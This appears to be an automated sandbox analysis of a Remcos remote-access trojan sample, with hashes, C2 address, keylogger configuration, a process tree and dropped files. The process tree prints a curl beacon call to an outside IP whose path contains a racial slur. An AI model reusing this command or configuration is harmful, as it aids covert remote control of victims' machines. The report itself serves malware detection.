Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-04-2024 11:56

General

  • Target

    av_sec.exe

  • Size

    11.2MB

  • MD5

    ab2c5633a45550670bca99f5cb82310c

  • SHA1

    1b41983e38999ab3dcbad4a74cf2c7bf6ef9711e

  • SHA256

    3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf

  • SHA512

    80c7f67c87aebabbaef79828d5f269229d6218ba12abb8473e71c95d9fe9e967ca288c1dcb97d2d97f67946b9350923318e298c2d7a276b25877b2c092bc7ec9

  • SSDEEP

    196608:cz97cMnvqx44EpYRPY4jTrcWrYdTjBI/TY0rA1q:k9wIvqx4xYRPYirxkZ6/j

Score
10/10

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

178.33.57.155:443

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PM1AI7

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\av_sec.exe
    "C:\Users\Admin\AppData\Local\Temp\av_sec.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
      C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
        C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1164
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            5⤵
            • Drops file in System32 directory
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:4396
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
              6⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1392
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=JIXWESNH
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2132
                • C:\Windows\SysWOW64\curl.exe
                  curl http://94.156.66.107:9000/hooks/nigger?id=JIXWESNH
                  8⤵
                    PID:2860
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xnalpexzlvrzcykqtzz.vbs"
                6⤵
                  PID:1944

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\794a03f7

        Filesize

        5.5MB

        MD5

        320634072eddd5b14ddddcf0e32d6608

        SHA1

        d8db9bf00db95b25d2cd8b2c5888d250b535232b

        SHA256

        bba6f76185241df9bf477ca6c815fb4914d000489ce84f54ed17eeda199a1714

        SHA512

        8ea9e10a14de6f84041af79548a07936e84ececfdcab9c248aaab4bb80f1e387a6c421afb35e93c619698d6c93b5ebdace3b2f858910a74076c827d5e24971ff

      • C:\Users\Admin\AppData\Local\Temp\84805a5f

        Filesize

        1.2MB

        MD5

        7b3cd0605ae084b071f870e32cc5adee

        SHA1

        b65c49d3299716474dc3682f4c80ecdc290add15

        SHA256

        79423972e0c008d546bf9b83e888d99a7e62bd615033b27cbf0e69b0c31c0bb6

        SHA512

        c895d88a90b244e03238ba645e24f960e3f6658326b870cb6e03fc01c1fe993bb0880fa069c48fe87274136e1c22b0f64e42779ced6697ffe67aff9bfc40b08e

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\Register.dll

        Filesize

        1.0MB

        MD5

        40b9628354ef4e6ef3c87934575545f4

        SHA1

        8fb5da182dea64c842953bf72fc573a74adaa155

        SHA256

        372b14fce2eb35b264f6d4aeef7987da56d951d3a09ef866cf55ed72763caa12

        SHA512

        02b0ea82efbfbe2e7308f86bfbec7a5109f3fe91d42731812d2e46aebedce50aabc565d2da9d3fbcd0f46febbff49c534419d1a91e0c14d5a80f06b74888c641

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe

        Filesize

        135KB

        MD5

        a2d70fbab5181a509369d96b682fc641

        SHA1

        22afcdc180400c4d2b9e5a6db2b8a26bff54dd38

        SHA256

        8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473

        SHA512

        219c6e7e88004fad9f4392be9a852c58fc43b7f6900e40370991427f37eaea5c18f48d2954f9479dde8bcb787345f4e292d5620add8224aec4d93d7968820b83

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\bronzite.rpm

        Filesize

        11KB

        MD5

        6e4ffb2517b3570bf0c6766b8a0253fa

        SHA1

        2143b82dd1c8c3f4d0e0b146e65667a4e8552a9e

        SHA256

        d690d10eac73dada021f73aa41e2e5f5f41d043ec3372512e138dc2f77623f41

        SHA512

        d15317ea42fcb44a247f6300e33f14079e166b8a5bce285099b0ee21c68ce6ed753fcb8279956d27c94deabd28586fc142b1d4b3c852e0b181691dc55c58aa6f

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\globule.jpg

        Filesize

        1.0MB

        MD5

        4b12739a07c02ef25a45d80516a87100

        SHA1

        d976238dd9a697b7c35f85d3157282dfb68f4522

        SHA256

        f003145b18b53ca237f3a0c1e7a21481c335467fe265474555dbc8e576d95fb6

        SHA512

        f91ee89bd928d6880e4c58ffdfea47cd54e3ef38b50181e3717b7cc67ca0e03d764478a34ffccb7d2ddf72f85a1d2940729c79c8d727c960db615921974b7265

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\rtl120.bpl

        Filesize

        1.1MB

        MD5

        adf82ed333fb5567f8097c7235b0e17f

        SHA1

        e6ccaf016fc45edcdadeb40da64c207ddb33859f

        SHA256

        d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50

        SHA512

        2253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\vcl120.bpl

        Filesize

        1.9MB

        MD5

        95ecaf8770cb3d948f45588fc04e0dfd

        SHA1

        49890478b975dcbb7bac20e330d9498312583f85

        SHA256

        5708ca3e0c822212494d2c4d51b2391904120cc5366adbc46e90fa9183d6b285

        SHA512

        55fa8098cbbc1503e2603f7dee57173ce429f6f5da8a00b37c79744f6063d2c46918e993712f24a42857b6ff87092fa1b4dc7c8f40483930b596824a6ffcb2bc

      • C:\Users\Admin\AppData\Local\Temp\check1.vbs

        Filesize

        146B

        MD5

        85a2ebad40c21ba1da77230265b5351f

        SHA1

        803822e08837ebda5de7dde963e4872ae2fc4c21

        SHA256

        b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9

        SHA512

        77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

      • C:\Users\Admin\AppData\Local\Temp\xnalpexzlvrzcykqtzz.vbs

        Filesize

        324B

        MD5

        5969db124f530f24b0e1b305ca5a8291

        SHA1

        5eb79a70cc356a20ba39913489a5cdca36f83011

        SHA256

        3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072

        SHA512

        0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290

      • memory/1164-71-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-65-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-74-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-72-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-69-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/2052-46-0x0000000000400000-0x0000000000421000-memory.dmp

        Filesize

        132KB

      • memory/2052-53-0x0000000050120000-0x000000005030D000-memory.dmp

        Filesize

        1.9MB

      • memory/2052-35-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2052-36-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/2052-49-0x0000000050000000-0x0000000050116000-memory.dmp

        Filesize

        1.1MB

      • memory/2148-58-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/2148-59-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2148-57-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2148-62-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2148-67-0x0000000050000000-0x0000000050116000-memory.dmp

        Filesize

        1.1MB

      • memory/2860-60-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-9-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-0-0x0000000000CA0000-0x0000000001804000-memory.dmp

        Filesize

        11.4MB

      • memory/2860-14-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-22-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-7-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-1-0x0000023D38F10000-0x0000023D38F11000-memory.dmp

        Filesize

        4KB

      • memory/4396-75-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/4396-76-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/4396-78-0x00000000009E0000-0x0000000000E13000-memory.dmp

        Filesize

        4.2MB

      • memory/4396-83-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/4396-87-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB